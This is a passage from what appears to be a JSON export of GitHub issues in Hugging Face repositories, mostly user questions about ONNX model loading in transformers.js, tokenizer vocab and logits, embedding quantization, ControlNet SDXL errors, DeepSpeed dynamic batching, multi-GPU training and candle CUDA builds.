\"text-generation\"\r\n```\r\n\r\nThough there are a few warnings I'm assuming I can ignore:\r\n\r\n```\r\nIgnore MatMul due to non constant B: /[/model/layers.22/self_attn/MatMul]\r\nIgnore MatMul due to non constant B: /[/model/layers.22/self_attn/MatMul_1]\r\nIgnore MatMul due to non constant B: /[/model/layers.23/self_attn/MatMul]\r\nIgnore MatMul due to non constant B: /[/model/layers.23/self_attn/MatMul_1]\r\n```\r\n\r\nHowever, out of the box it can't find the right `onnx` file:\r\n\r\n```\r\nError: `local_files_only=true` or `env.allowRemoteModels=false` and file was not found locally at \"transformers.js/scripts/models/phi-1_5_dev/onnx/decoder_model_merged_quantized.onnx\".\r\n```\r\n\r\nI see in the [`@Xenova` repo history](https://huggingface.co/Xenova/phi-1_5_dev/commit/ae1a980babe16f9d136c22eb119d171dec7c6a09) that the files were manually renamed; I'll try that too:\r\n\r\n```\r\nmv model.onnx decoder_model_merged.onnx\r\nmv model_quantized.onnx decoder_model_merged_quantized.onnx\r\nmv model.onnx_data decoder_model_merged.onnx_data\r\n```\r\n\r\nI then try to run the model with:\r\n\r\n```\r\n const model = await loadModel('transformers.js/scripts/models/phi-1_5_dev', {\r\n });\r\n\r\n const result = await model('Write me a list of numbers:\\n', {\r\n });\r\n console.log('result', result);\r\n```\r\n\r\nThe model loads, but upon generating I see:\r\n\r\n```\r\nWARNING: Too many inputs were provided (51 > 3). 
The following inputs will be ignored: \"past_key_values.0.key, past_key_values.0.value, past_key_values.1.key, past_key_values.1.value, past_key_values.2.key, past_key_values.2.value, past_key_values.3.key, past_key_values.3.value, past_key_values.4.key, past_key_values.4.value, past_key_values.5.key, past_key_values.5.value, past_key_values.6.key, past_key_values.6.value, past_key_values.7.key, past_key_values.7.value, past_key_values.8.key, past_key_values.8.value, past_key_values.9.key, past_key_values.9.value, past_key_values.10.key, past_key_values.10.value, past_key_values.11.key, past_key_values.11.value, past_key_values.12.key, past_key_values.12.value, past_key_values.13.key, past_key_values.13.value, past_key_values.14.key, past_key_values.14.value, past_key_values.15.key, past_key_values.15.value, past_key_values.16.key, past_key_values.16.value, past_key_values.17.key, past_key_values.17.value, past_key_values.18.key, past_key_values.18.value, past_key_values.19.key, past_key_values.19.value, past_key_values.20.key, past_key_values.20.value, past_key_values.21.key, past_key_values.21.value, past_key_values.22.key, past_key_values.22.value, past_key_values.23.key, past_key_values.23.value\".\r\n2024-04-15 11:00:50.956 node[91488:12372370] 2024-04-15 11:00:50.956090 [E:onnxruntime:, sequential_executor.cc:494 ExecuteKernel] Non-zero status code returned while running Gather node. Name:'/model/layers.0/self_attn/Gather_4' Status Message: indices element out of data bounds, idx=8 must be within the inclusive range [-1,0]\r\nAn error occurred during model execution: \"Error: Non-zero status code returned while running Gather node. Name:'/model/layers.0/self_attn/Gather_4' Status Message: indices element out of data bounds, idx=8 must be within the inclusive range [-1,0]\".\r\nInputs given to model: [Object: null prototype] {\r\n input_ids: Tensor {\r\n dims: [ 1, 1 ],\r\n type: 'int64',\r\n data: BigInt64Array(1) [ 13n ],\r\n size: 1\r\n },\r\n attention_mask: T", "url": "https://github.com/huggingface/transformers.js/issues/714", "state": "open", "labels": [ "question" ], "created_at": "2024-04-15T15:02:33Z", "updated_at": "2024-05-10T14:26:00Z", "user": "thekevinscott" }, { "repo": "huggingface/sentence-transformers", "number": 2594, "title": "What is the maximum number of sentences that a fast cluster can cluster?", "body": "What is the maximum number of sentences that a fast cluster can cluster? When I cluster 2 million sentences, the cluster gets killed.", "url": "https://github.com/huggingface/sentence-transformers/issues/2594", "state": "open", "labels": [], "created_at": "2024-04-15T09:55:06Z", "updated_at": "2024-04-15T09:55:06Z", "user": "BinhMinhs10" }, { "repo": "huggingface/dataset-viewer", "number": 2721, "title": "Help dataset owner to chose between configs and splits?", "body": "See https://huggingface.slack.com/archives/C039P47V1L5/p1713172703779839\r\n\r\n> Am I correct in assuming that if you specify a \"config\" in a dataset, only the given config is downloaded, but if you specify a split, all splits for that config are downloaded? I came across it when using facebook's belebele (https://huggingface.co/datasets/facebook/belebele). Instead of a config for each language, they use a split for each language, but that seems to mean that the full dataset is downloaded, even if you select just one language split.\r\n\r\nFor languages, we recommend using different configs, not splits.\r\n\r\nMaybe we should also show a warning / open a PR/discussion? 
when a dataset contains more than 5 splits, hinting that it might be better to use configs?", "url": "https://github.com/huggingface/dataset-viewer/issues/2721", "state": "open", "labels": [ "question", "P2" ], "created_at": "2024-04-15T09:51:43Z", "updated_at": "2024-05-24T15:17:51Z", "user": "severo" }, { "repo": "huggingface/diffusers", "number": 7676, "title": "How to determine the type of file, such as checkpoint, etc.", "body": "Hello.\r\nIs there some kind of script that determines the type of file \"checkpoint\", \"LORA\", \"textual_inversion\", etc.?", "url": "https://github.com/huggingface/diffusers/issues/7676", "state": "closed", "labels": [], "created_at": "2024-04-14T23:58:08Z", "updated_at": "2024-04-15T02:50:43Z", "user": "suzukimain" }, { "repo": "huggingface/diffusers", "number": 7670, "title": "How to use IDDPM in diffusers ?", "body": "The code base is here:\r\nhttps://github.com/openai/improved-diffusion/blob/main/improved_diffusion/gaussian_diffusion.py", "url": "https://github.com/huggingface/diffusers/issues/7670", "state": "closed", "labels": [ "should-move-to-discussion" ], "created_at": "2024-04-14T12:30:34Z", "updated_at": "2024-11-20T00:17:18Z", "user": "jiarenyf" }, { "repo": "huggingface/transformers.js", "number": 713, "title": "Help understanding logits and model vocabs", "body": "### Question\r\n\r\nI'm trying to write a custom `LogitsProcessor` and have some questions. For reference, I'm using [`Xenova/phi-1_5_dev`](https://huggingface.co/Xenova/phi-1_5_dev). I'm trying to implement a custom logic for white or blacklisting tokens, but running into difficulties understanding how to interpret token ids, tokens, and their decoded counterparts.\r\n\r\nHere's what I think I understand:\r\n\r\n- [The vocab file is defined at `vocab.json`](https://huggingface.co/Xenova/phi-1_5_dev/blob/main/vocab.json), and has 50,257 entries. \r\n- This file is exposed on `pipeline.tokenizer.vocab`, translated from the object representation of `vocab.json` (`{ token: tokenID }`), to an array of `token`s whose indices correspond to `tokenID`. \r\n - **Question:** `vocab.json` has 50,257 entries, but `pipeline.tokenizer.vocab` has 50,295 entries. Is this because `pipeline.tokenizer.vocab` _also_ includes `added_tokens.json`?\r\n - And [`special_tokens_map.json`](https://huggingface.co/Xenova/phi-1_5_dev/blob/main/special_tokens_map.json) is already included in `vocab.json` it appears\r\n- The tokens in the vocab file must be decoded before being displayed\r\n - for example, the token in `vocab.json` at `50255` is `\"\u0120gazed\"`, but if I decode this character by character (`pipeline.tokenizer.decoder.byte_decoder('\u0120')` becomes `32` which corresponds to a space `\" \"`) I get `\" gazed\"`. I _think_ these correspond to code points.\r\n- The `logits` argument contains scores where the index of each score is the `tokenID`. So setting the score at position `50255` to `-Infinity` should ensure that the token `\"\u0120gazed\"` (or, decoded, `\" gazed\"`) should never appear.\r\n- The `logits` argument I'm getting back for this model in my `LogitsProcessor` has dimensions of `[51200,]`. `pipeline.tokenizer.vocab` has size of is 50,295. That would seem to indicate 905 unused tokens at the end of the tensor; can these be safely ignored, or do they correspond to something important that I'm missing?\r\n\r\nI'd appreciate any insight or feedback on whether my assumptions above are correct or not. 
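For what it's worth, the size arithmetic above can be checked directly. Below is a minimal sketch using the Python `transformers` tokenizer as a stand-in for the Transformers.js API (the model id is illustrative; padding the logit dimension past the vocab size — here 51,200 vs. 50,295 — is a common efficiency choice, and the extra rows can simply be ignored or masked):

```python
import torch
from transformers import AutoTokenizer

# Illustrative model id; phi-1_5 uses a GPT-2-style byte-level BPE.
tokenizer = AutoTokenizer.from_pretrained("microsoft/phi-1_5")

vocab = tokenizer.get_vocab()              # vocab.json entries plus added tokens
print(len(vocab))                          # base 50,257 + added_tokens.json entries

token_id = vocab["\u0120gazed"]            # "Ġ" is the byte-level marker for a leading space
print(repr(tokenizer.decode([token_id])))  # ' gazed'

logits = torch.randn(1, 51200)             # logit dim padded past the vocab size
logits[0, token_id] = float("-inf")        # masked: this token can now never be sampled
```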
Thank you!", "url": "https://github.com/huggingface/transformers.js/issues/713", "state": "closed", "labels": [ "question" ], "created_at": "2024-04-13T21:06:14Z", "updated_at": "2024-04-14T15:17:43Z", "user": "thekevinscott" }, { "repo": "huggingface/lighteval", "number": 155, "title": "How to run 30b plus model with lighteval when accelerate launch failed? OOM", "body": "CUDA Memory OOM when I launch an evaluation for 30b model using lighteval.\r\n\r\n\r\nWhats the correct config for it?", "url": "https://github.com/huggingface/lighteval/issues/155", "state": "closed", "labels": [], "created_at": "2024-04-13T03:49:20Z", "updated_at": "2024-05-04T11:18:38Z", "user": "xiechengmude" }, { "repo": "huggingface/transformers", "number": 30213, "title": "Mamba: which tokenizer has been saved and how to use it?", "body": "### System Info\n\nHardware independent.\n\n### Who can help?\n\n@ArthurZucker \r\n\r\nI described the doubts in the link below around 1 month ago, but maybe model-hub discussions are not so active. Then I post it here as repo issue. Please, let me know where to discuss it :)\r\n\r\nhttps://huggingface.co/state-spaces/mamba-2.8b-hf/discussions/1\r\n\r\nThanks!\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n.\n\n### Expected behavior\n\n.", "url": "https://github.com/huggingface/transformers/issues/30213", "state": "closed", "labels": [], "created_at": "2024-04-12T11:28:17Z", "updated_at": "2024-05-17T13:13:12Z", "user": "javiermcebrian" }, { "repo": "huggingface/sentence-transformers", "number": 2587, "title": "Implementing Embedding Quantization for Dynamic Serving Contexts", "body": "I'm currently exploring embedding quantization strategies to enhance storage and computation efficiency while maintaining high accuracy. Specifically, I'm looking at integrating these strategies with Infinity (https://github.com/michaelfeil/infinity/discussions/198), a high-throughput, low-latency REST API for serving vector embeddings. \r\n\r\nHere is the quantization method I want to use from sentence-transformers (specifically scalar int8, because binary quant. also reduces the vector dimensions, something I do not want to keep the accuracy high): https://sbert.net/examples/applications/embedding-quantization/README.html\r\n\r\nSo this is what I want to apply:\r\n```\r\nfrom sentence_transformers import SentenceTransformer\r\nfrom sentence_transformers.quantization import quantize_embeddings\r\nfrom datasets import load_dataset\r\n\r\n# 1. Load an embedding model\r\nmodel = SentenceTransformer(\"mixedbread-ai/mxbai-embed-large-v1\")\r\n\r\n# 2. Prepare an example calibration dataset\r\ncorpus = load_dataset(\"nq_open\", split=\"train[:1000]\")[\"question\"]\r\ncalibration_embeddings = model.encode(corpus)\r\n\r\n# 3. Encode some text without quantization & apply quantization afterwards\r\nembeddings = model.encode([\"I am driving to the lake.\", \"It is a beautiful day.\"])\r\nint8_embeddings = quantize_embeddings(\r\n embeddings,\r\n precision=\"int8\",\r\n calibration_embeddings=calibration_embeddings,\r\n)\r\n```\r\n\r\nThe main challenge for me which arises with scalar quantization is, that it requires a calibration dataset to compute min and max values, making the embedding process stateful. 
This conflicts with the need for flexible, dynamic serving via the Infinity API, which typically handles embeddings on the fly. The embedding API I created is used by various other services that have different types of datasets, so I am looking for a way to avoid needing such a calibration dataset.\r\n\r\nI am seeking advice on:\r\n\r\n- Managing the statefulness introduced by scalar quantization.\r\n- Alternative strategies that might be more suitable for dynamic environments where embeddings are generated on demand.\r\n\r\nAny guidance or suggestions on how to tackle these issues would be greatly appreciated.\r\n\r\nThank you!", "url": "https://github.com/huggingface/sentence-transformers/issues/2587", "state": "open", "labels": [ "question" ], "created_at": "2024-04-11T11:03:23Z", "updated_at": "2024-04-12T07:28:48Z", "user": "Nookbe" }, { "repo": "huggingface/diffusers", "number": 7636, "title": "how to use the controlnet sdxl tile model in diffusers", "body": "### Describe the bug\n\nI want to use [this model](https://huggingface.co/TTPlanet/TTPLanet_SDXL_Controlnet_Tile_Realistic_V1) to make my slightly blurry photos clear, which is how I found it.\r\nI followed the code [here](https://huggingface.co/lllyasviel/control_v11f1e_sd15_tile), but since the model mentioned above is XL rather than 1.5, I changed the code, and it errors.\n\n### Reproduction\n\n```python\r\nimport torch\r\nfrom PIL import Image\r\nfrom diffusers import ControlNetModel, DiffusionPipeline, StableDiffusionXLControlNetPipeline\r\n\r\ndef resize_for_condition_image(input_image: Image, resolution: int):\r\n    input_image = input_image.convert(\"RGB\")\r\n    W, H = input_image.size\r\n    k = float(resolution) / min(H, W)\r\n    H *= k\r\n    W *= k\r\n    H = int(round(H / 64.0)) * 64\r\n    W = int(round(W / 64.0)) * 64\r\n    img = input_image.resize((W, H), resample=Image.LANCZOS)\r\n    return img\r\n\r\ncontrolnet = ControlNetModel.from_pretrained('/mnt/asian-t2i/pretrained_models/TTPLanet_SDXL_Controlnet_Tile_Realistic_V1',\r\n    torch_dtype=torch.float16, use_safetensors=True)\r\n\r\npipe = DiffusionPipeline.from_pretrained(\"/mnt/asian-t2i/pretrained_models/RealVisXL_V3.0\",\r\n    custom_pipeline=\"stable_diffusion_controlnet_img2img\",\r\n    controlnet=controlnet,\r\n    torch_dtype=torch.float16).to('cuda')\r\n\r\npipe.enable_xformers_memory_efficient_attention()\r\n\r\nsource_image = Image.open(\"/mnt/asian-t2i/data/luchuan/1024/0410-redbook-luchuan-6.jpg\")\r\n\r\ncondition_image = resize_for_condition_image(source_image, 1024)\r\n\r\nimage = pipe(\r\n    prompt=\"best quality\",\r\n    negative_prompt=\"blur, lowres, bad anatomy, bad hands, cropped, worst quality\",\r\n    image=condition_image,\r\n    controlnet_conditioning_image=condition_image,\r\n    width=condition_image.size[0],\r\n    height=condition_image.size[1],\r\n    strength=1.0,\r\n    generator=torch.manual_seed(0),\r\n    num_inference_steps=32,\r\n).images[0]\r\n\r\nimage.save('output.png')\r\n```\n\n### Logs\n\n```shell\n/opt/conda/lib/python3.10/site-packages/huggingface_hub/file_download.py:678: FutureWarning: 'cached_download' is the legacy way to download files from the HF hub, please consider upgrading to 'hf_hub_download'\r\n warnings.warn(\r\nLoading pipeline components...: 
100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 5/5 [00:02<00:00, 2.00it/s]\r\nYou have disabled the safety checker for by passing `safety_checker=None`. Ensure that you abide to the conditions of the Stable Diffusion license and do not expose unfiltered results in services or applications open to the public. Both the diffusers team and Hugging Face strongly recommend to keep the safety filter enabled in all public facing circumstances, disabling it only for use-cases that involve analyzing network behavior or auditing its results. For more information, please have a look at https://github.com/huggingface/diffusers/pull/254 .\r\n 0%|          | 0/32 [00:00<?, ?it/s]\r\nTraceback (most recent call last):\r\n  File \"...\", line ..., in <module>\r\n    image = pipe(\r\n File \"/opt/conda/lib/python3.10/site-packages/torch/utils/_contextlib.py\", line 115, in decorate_context\r\n return func(*args, **kwargs)\r\n File \"/root/.cache/huggingface/modules/diffusers_modules/git/stable_diffusion_controlnet_img2img.py\", line 839, in __call__\r\n down_block_res_samples, mid_block_res_sample = self.controlnet(\r\n File \"/opt/conda/lib/python3.10/site-packages/torch/nn/modules/module.py\", line 1511, in _wrapped_call_impl\r\n return self._call_impl(*args, **kwargs)\r\n File \"/opt/conda/lib/python3.10/site-packages/torch/nn/modules/module.py\", line 1520, in _call_impl\r\n return forward_call(*args, **kwargs)\r\n File \"/mnt/asian-t2i/diffusers/src/diffusers/models/controlnet.py\", line 775, in forward\r\n if \"text_embeds\" not in added_cond_kwargs:\r\nTypeError: argument of type 'NoneType' is not iterable\n```\n\n\n### System Info\n\nName: diffusers\r\nVersion: 0.27.0.dev0\n\n### Who can help?\n\n@sayakpaul @yiyixuxu @DN6 ", "url": "https://github.com/huggingface/diffusers/issues/7636", "state": "closed", "labels": [ "bug", "stale" ], "created_at": "2024-04-11T03:20:42Z", "updated_at": "2024-06-29T13:26:58Z", "user": "xinli2008" }, { "repo": "huggingface/optimum-quanto", "number": 161, "title": "Question: any plan to formally support smooth quantization and make it more general", "body": "Awesome work!\r\n\r\nI noticed there is a SmoothQuant implementation under [external](https://github.com/huggingface/quanto/tree/main/external/smoothquant). Currently, its implementation seems to be model-specific: we can only apply smoothing to particular `Linear` layers.\r\nHowever, in general, smoothing can be applied to any `Linear` by inserting a `mul`. Are there any plans to officially support smooth quantization in-tree?
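For context, here is a minimal sketch of the general "insert a `mul`" idea described above (my own illustration, not quanto's API; `act_max` is assumed to be a per-input-channel activation maximum gathered beforehand, and `alpha` is the usual SmoothQuant migration strength):

```python
import torch
import torch.nn as nn

@torch.no_grad()
def smooth_linear(linear: nn.Linear, act_max: torch.Tensor, alpha: float = 0.5) -> torch.Tensor:
    """Migrate quantization difficulty from the activations into the weights.

    Returns the per-channel scale s; the caller must divide the layer's input
    by s (the inserted `mul`), so that (x / s) @ (W * s).T == x @ W.T.
    """
    w_max = linear.weight.abs().amax(dim=0)        # per-input-channel weight max, shape (in,)
    s = act_max.pow(alpha) / w_max.pow(1 - alpha)  # SmoothQuant scale rule
    linear.weight.mul_(s)                          # scale each input channel of W
    return s

# Usage on a toy layer: the output is unchanged up to float error.
layer = nn.Linear(4, 2, bias=False)
x = torch.randn(3, 4)
y_ref = layer(x)
s = smooth_linear(layer, act_max=x.abs().amax(dim=0))
assert torch.allclose(layer(x / s), y_ref, atol=1e-5)
```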
My initial thought was, is it possible to define a `SmoothTensor` and use `__torch_dispatch__` to override the `bmm` behavior?", "url": "https://github.com/huggingface/optimum-quanto/issues/161", "state": "closed", "labels": [ "question", "Stale" ], "created_at": "2024-04-11T02:45:31Z", "updated_at": "2024-05-18T01:49:52Z", "user": "yiliu30" }, { "repo": "huggingface/accelerate", "number": 2647, "title": "How to use deepspeed with dynamic batch?", "body": "### System Info\n\n```Shell\n- `Accelerate` version: 0.29.1\r\n- Platform: Linux-5.19.0-46-generic-x86_64-with-glibc2.35\r\n- `accelerate` bash location: /home/yuchao/miniconda3/envs/TorchTTS/bin/accelerate\r\n- Python version: 3.10.13\r\n- Numpy version: 1.23.5\r\n- PyTorch version (GPU?): 2.2.2+cu118 (True)\r\n- PyTorch XPU available: False\r\n- PyTorch NPU available: False\r\n- PyTorch MLU available: False\r\n- System RAM: 125.48 GB\r\n- GPU type: NVIDIA GeForce RTX 4090\r\n- `Accelerate` default config:\r\n gradient_accumulation_steps: 1\r\n gradient_clipping: 1.0\r\n offload_optimizer_device: none\r\n offload_param_device: none\r\n zero3_init_flag: false\r\n zero_stage: 2\n```\n\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] One of the scripts in the examples/ folder of Accelerate or an officially supported `no_trainer` script in the `examples` folder of the `transformers` repo (such as `run_no_trainer_glue.py`)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nFor sequence task, we always use dynamic batch to group long sequence to small batches while group short sequence to large batches. But deepspeed here needs to specify either `batch_size` or `train_micro_batch_size_per_gpu` which is unavailable for use. Any idea to fix that?\r\n```\r\nWhen using DeepSpeed, `accelerate.prepare()` requires you to pass at least one of training or evaluation dataloaders with `batch_size` attribute returning an integer value or alternatively set an integer value in `train_micro_batch_size_per_gpu` in the deepspeed config file or assign integer value to `AcceleratorState().deepspeed_plugin.deepspeed_config['train_micro_batch_size_per_gpu']`.\r\n```\n\n### Expected behavior\n\nBe able to train deepspeed with dynamic batch", "url": "https://github.com/huggingface/accelerate/issues/2647", "state": "closed", "labels": [], "created_at": "2024-04-10T09:09:53Z", "updated_at": "2025-05-11T15:07:27Z", "user": "npuichigo" }, { "repo": "huggingface/transformers.js", "number": 690, "title": "Is top-level await necessary in the v3 branch?", "body": "### Question\r\n\r\nI saw the excellent performance of WebGPU, so I tried to install xenova/transformers.js#v3 as a dependency in my project.\r\n\r\nI found that v3 uses the top-level await syntax. If I can't restrict users to using the latest browser version, I have to make it compatible (using `vite-plugin-top-level-await` or `rollup-plugin-tla`).\r\n\r\nIs it possible to use other methods instead of top-level await? 
Or is this project not intended to support users who do not have support for top-level await?\r\n\r\nThanks.", "url": "https://github.com/huggingface/transformers.js/issues/690", "state": "closed", "labels": [ "question" ], "created_at": "2024-04-10T08:49:32Z", "updated_at": "2024-04-11T17:18:42Z", "user": "ceynri" }, { "repo": "huggingface/optimum-quanto", "number": 158, "title": "How does quanto support int8 conv2d and linear?", "body": "Hi, I looked into the code and didn't find any CUDA kernel related to conv2d and linear. How did you implement the CUDA backend for conv2d/linear? Thanks", "url": "https://github.com/huggingface/optimum-quanto/issues/158", "state": "closed", "labels": [ "question" ], "created_at": "2024-04-10T05:41:43Z", "updated_at": "2024-04-11T09:26:35Z", "user": "zhexinli" }, { "repo": "huggingface/transformers.js", "number": 689, "title": "Abort the audio recognition process", "body": "### Question\n\nHello! How can I stop the audio file recognition process while keeping the model loaded? If I terminate the worker, I have to reload the model to start recognizing a new audio file. I need either the ability to send the pipeline a command to stop the recognition process, or the ability to first load the model and then pass it as an object to the pipeline. Thank you.", "url": "https://github.com/huggingface/transformers.js/issues/689", "state": "open", "labels": [ "question" ], "created_at": "2024-04-10T02:51:37Z", "updated_at": "2024-04-20T06:09:11Z", "user": "innoware11" }, { "repo": "huggingface/transformers", "number": 30154, "title": "Question about how to write code for trainer and dataset for multi-GPU", "body": "### System Info\n\n- Platform: Linux-5.15.0-1026-aws-x86_64-with-glibc2.29\r\n- Python version: 3.8.10\r\n- Huggingface_hub version: 0.20.3\r\n- Safetensors version: 0.4.2\r\n- Accelerate version: 0.27.2\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\nHi, I have a quick question on how to write dataset and trainer code for a multi-GPU setting.\r\n\r\nHere is my workflow.\r\n\r\n\r\nI have a dataset that I load with\r\n```\r\ndataset = dataset.load_dataset(...)\r\n```\r\nI need to do some preprocessing for it, and the dataset becomes an iterable dataset.\r\nI then pass the dataset into the trainer like\r\n```\r\ntrainer = Trainer(train_data=dataset)\r\ntrainer.train()\r\n```\r\n\r\nMy question is: since I am running on multiple GPUs and use the command\r\n```\r\ntorchrun --standalone --nnodes=1 --nproc_per_node=2 train_lora.py\r\n```\r\ntwo processes execute the same code above, which causes the dataset and trainer to be created twice. Should the dataset and trainer be created once or twice? If once, should I wrap all the code like this?\r\n\r\n```\r\nif accelerator.is_main_process:\r\n    dataset = dataset.load_dataset(...)\r\n    trainer = Trainer(train_data=dataset)\r\n    trainer.train()\r\n```\r\nI do observe that only one dataset is used for generating the samples, even if we create two dataset objects and do not wrap the code in accelerator.is_main_process. That is because the dataset is already converted by the trainer for distributed training. So I think there is no point in creating the dataset twice, since we only use the first one (see the sketch below).
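A minimal sketch of the usual pattern, for reference (assumptions: a toy dataset and model, and that the script is launched with the `torchrun` command above; `Trainer` shards the batches itself, so nothing is wrapped in a main-process guard):

```python
from datasets import load_dataset
from transformers import (AutoModelForSequenceClassification, AutoTokenizer,
                          Trainer, TrainingArguments)

tok = AutoTokenizer.from_pretrained("distilbert-base-uncased")
ds = load_dataset("imdb", split="train[:1%]")
ds = ds.map(lambda b: tok(b["text"], truncation=True, padding="max_length",
                          max_length=128), batched=True)

# Every rank runs all of this; Trainer wires up the distributed sampler and
# dataloader per process, so the "duplicate" dataset/trainer objects are expected.
model = AutoModelForSequenceClassification.from_pretrained("distilbert-base-uncased")
trainer = Trainer(
    model=model,
    args=TrainingArguments(output_dir="out", per_device_train_batch_size=4),
    train_dataset=ds,
)
trainer.train()
```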
How should I write the code so that there is no error on the second process? If I make the second process's dataset None, the trainer raises an error because the dataset is empty.\r\nDo we need to create two trainers, each corresponding to one GPU, or should we have a single trainer in charge of both GPUs? What is the best way to write the code in this case?\r\n\r\n \r\n\n\n### Expected behavior\n\nThe correct way to implement this situation.", "url": "https://github.com/huggingface/transformers/issues/30154", "state": "closed", "labels": [], "created_at": "2024-04-10T00:08:00Z", "updated_at": "2024-04-10T22:57:53Z", "user": "zch-cc" }, { "repo": "huggingface/accelerate", "number": 2643, "title": "How to use gather_for_metrics for object detection models?", "body": "### Reproduction\r\n\r\nI used the `gather_for_metrics` function as follows:\r\n```python\r\npredictions, ground_truths = accelerator.gather_for_metrics((predictions, ground_truths))\r\n```\r\n\r\nAnd I've got the error:\r\n```\r\naccelerate.utils.operations.DistributedOperationException: Impossible to apply the desired operation due to inadequate shapes. All shapes on the devices must be valid.\r\n```\r\n\r\n* ground_truths are dictionaries of torch.tensor with keys: `boxes`, `labels`, `image_id`, `area`, `iscrowd`, following the PyTorch conventions: https://pytorch.org/tutorials/intermediate/torchvision_tutorial.html.\r\n\r\n* predictions are dictionaries of torch.tensor with `boxes`, `labels` and `scores` keys.\r\n\r\nI use 3 GPUs, and on each I have 120 dictionaries of predictions and ground truths, but as expected, inside each dictionary the tensor size varies from 0 to n bbox predictions/ground truths.\r\nBut during the gather, the `verify_operation` decorator raises an error because the tensor shapes inside the different dictionaries vary.\r\n\r\n### Expected behavior\r\n\r\nHave the possibility to gather complex objects like dictionaries of torch.tensor with different shapes!\r\n\r\nThank you for your help and for this amazing framework \ud83d\ude4f ", "url": "https://github.com/huggingface/accelerate/issues/2643", "state": "closed", "labels": [], "created_at": "2024-04-09T23:15:20Z", "updated_at": "2024-04-30T07:48:36Z", "user": "yann-rdgz" }, { "repo": "huggingface/candle", "number": 2033, "title": "How to use CUDA as the backend in `candle-wasm-examples/llama2-c` ?", "body": "How to use CUDA as the backend in `candle-wasm-examples/llama2-c`?\r\n\r\nIn `candle-wasm-examples/llama2-c`, I made the changes shown below.\r\n\r\n```diff\r\n--- a/candle-wasm-examples/llama2-c/Cargo.toml\r\n+++ b/candle-wasm-examples/llama2-c/Cargo.toml\r\n@@ -9,7 +9,7 @@ categories.workspace = true\r\n license.workspace = true\r\n\r\n [dependencies]\r\n-candle = { workspace = true }\r\n+candle = { workspace = true, features = [\"cuda\"] }\r\n candle-nn = { workspace = true }\r\n candle-transformers = { workspace = true }\r\n num-traits = { workspace = true }\r\n\r\n```\r\n```diff\r\n--- a/candle-wasm-examples/llama2-c/src/bin/m.rs\r\n+++ b/candle-wasm-examples/llama2-c/src/bin/m.rs\r\n@@ -14,7 +14,7 @@ pub struct Model {\r\n impl Model {\r\n fn process(&mut self, tokens: &[u32]) -> candle::Result {\r\n const REPEAT_LAST_N: usize = 64;\r\n- let dev = Device::Cpu;\r\n+ let dev = Device::new_cuda(0)?;\r\n let input = Tensor::new(tokens, &dev)?.unsqueeze(0)?;\r\n let logits = self.inner.llama.forward(&input, tokens.len())?;\r\n let logits = logits.squeeze(0)?;\r\n```\r\n```diff\r\n--- 
a/candle-wasm-examples/llama2-c/src/worker.rs\r\n+++ b/candle-wasm-examples/llama2-c/src/worker.rs\r\n@@ -65,7 +65,7 @@ impl Model {\r\n top_p: f64,\r\n prompt: String,\r\n ) -> Result<()> {\r\n- let dev = Device::Cpu;\r\n+ let dev = Device::new_cuda(0)?;\r\n let temp = if temp <= 0. { None } else { Some(temp) };\r\n let top_p = if top_p <= 0. || top_p >= 1.0 {\r\n None\r\n@@ -248,7 +248,7 @@ impl TransformerWeights {\r\n\r\n impl Model {\r\n pub fn load(md: ModelData) -> Result {\r\n- let dev = Device::Cpu;\r\n+ let dev = Device::new_cuda(0)?;\r\n let mut model = std::io::Cursor::new(md.model);\r\n let config = Config::from_reader(&mut model)?;\r\n let weights = TransformerWeights::from_reader(&mut model, &config, &dev)?;\r\n```\r\nBut when I execute `trunk serve --release --public-url / --port 8080`, some errors occur.\r\n```shell\r\n = note: rust-lld: error: unable to find library -lcuda\r\n rust-lld: error: unable to find library -lnvrtc\r\n rust-lld: error: unable to find library -lcurand\r\n rust-lld: error: unable to find library -lcublas\r\n rust-lld: error: unable to find library -lcublasLt\r\n\r\n\r\nerror: could not compile `candle-wasm-example-llama2` (bin \"worker\") due to 1 previous error\r\n2024-04-09T16:12:09.062364Z ERROR error\r\nerror from build pipeline\r\n\r\nCaused by:\r\n 0: HTML build pipeline failed (2 errors), showing first\r\n 1: error from asset pipeline\r\n 2: running cargo build\r\n 3: error during cargo build execution\r\n 4: cargo call to executable 'cargo' with args: '[\"build\", \"--target=wasm32-unknown-unknown\", \"--manifest-path\", \"/work/training/candle/candle-wasm-examples/llama2-c/Cargo.toml\", \"--bin\", \"worker\"]' returned a bad status: exit status: 101\r\n```\r\nHow should I solve the above problem?\r\n\r\n I confirm that my CUDA installed correctly and I'm able to execute the following commands.\r\n```shell\r\ncargo new myapp\r\ncd myapp\r\ncargo add --git https://github.com/huggingface/candle.git candle-core --features \"cuda\"\r\ncargo build\r\n```\r\n", "url": "https://github.com/huggingface/candle/issues/2033", "state": "closed", "labels": [], "created_at": "2024-04-09T16:16:55Z", "updated_at": "2024-04-12T08:26:24Z", "user": "wzzju" }, { "repo": "huggingface/optimum", "number": 1804, "title": "advice for simple onnxruntime script for ORTModelForVision2Seq (or separate encoder/decoder)", "body": "I am trying to use implement this [class ](https://github.com/huggingface/optimum/blob/69af5dbab133f2e0ae892721759825d06f6cb3b7/optimum/onnxruntime/modeling_seq2seq.py#L1832) in C++ because unfortunately I didn't find any C++ implementation for this. \r\n\r\nTherefore, my current approach is to revert this class and the auxiliary classes to a simple onnxruntime prediction, to make things easier to port to C++. \r\n\r\nDoes anyone have any advice in this matter? Thank you\r\n", "url": "https://github.com/huggingface/optimum/issues/1804", "state": "open", "labels": [ "question", "onnxruntime" ], "created_at": "2024-04-09T15:14:40Z", "updated_at": "2024-10-14T12:41:15Z", "user": "eduardatmadenn" }, { "repo": "huggingface/chat-ui", "number": 997, "title": "Community Assistants", "body": "Hi, I've looked through all the possible issues but I didn't find what I was looking for. \r\n\r\nOn self-hosted is the option to have the community assistants such as the ones on https://huggingface.co/chat/ not available? 
